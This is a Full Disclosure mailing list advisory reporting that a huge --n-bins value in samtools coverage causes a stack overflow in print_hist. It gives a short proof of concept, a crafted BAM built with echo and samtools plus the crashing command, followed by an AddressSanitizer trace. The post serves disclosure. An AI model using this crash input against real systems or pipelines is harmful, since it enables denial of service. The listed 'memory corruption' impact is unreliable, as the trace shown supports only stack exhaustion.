Full Disclosure mailing list archives

Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow


From: Ron E <ronaldjedgerson () gmail com>
Date: Sun, 28 Sep 2025 12:13:48 -0400

In the samtools coverage subcommand, the -w / --n-bins option allows the
user to specify how many “bins” to produce in the coverage histogram. The
code computes: stats[tid].bin_width = (stats[tid].end - stats[tid].beg) /
n_bins; When the number of bins (n_bins) is extremely large relative to the
region length (end - beg), this integer division can yield zero, or lead to
unexpected behavior in subsequent arithmetic. Later in print_hist(),
calculations involving current_bin, row_bin_size, and loop bounds can
overflow or cause invalid branching, eventually leading to stack recursion
or unbounded stack-consumption. In practice, supplying a huge bin count
(e.g. 2147483647) triggers stack overflow in print_hist() (as observed) and
crashes the program.


*Impact:*


   - Denial of Service (DoS).
   - Memory corruption.

*PoC (Proof of Concept)*
Create a minimal BAM with a large declared reference size and one read:
echo -e "@HD\tVN:1.6@SQ\tSN:chrX\tLN:500000000r1\t0\tchrX\t1\t60\t10M\t*\t0\t0\tAAAAAAAAAA\tIIIIIIIIII"
\ | ./samtools view -b -o huge.bam -
./samtools index huge.bam

Run coverage with a massive bin count:
./samtools coverage -w 2147483647 huge.bam


* Expected crash:*

AddressSanitizer:DEADLYSIGNAL

=================================================================

==1070796==ERROR: AddressSanitizer: stack-overflow on address
0xfffef18a7ff0 (pc 0xab400a2993cc bp 0xffffdff5a910 sp 0xfffef18a7ff0 T0)

    #0 0xab400a2993cc in print_hist /root/samtools/coverage.c:236:22

    #1 0xab400a29c304 in main_coverage /root/samtools/coverage.c:674:13

    #2 0xab400a286044 in main /root/samtools/bamtk.c:271:55

    #3 0xff6004352290 in __libc_start_call_main
csu/../sysdeps/nptl/libc_start_call_main.h:58:16

    #4 0xff6004352374 in __libc_start_main csu/../csu/libc-start.c:360:3

    #5 0xab400a15cc6c in _start (/root/samtools/samtools+0x3cc6c) (BuildId:
031fb204568f835410c0dd07ee99a915c9a7b660)


SUMMARY: AddressSanitizer: stack-overflow /root/samtools/coverage.c:236:22
in print_hist

==1070796==ABORTING
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread: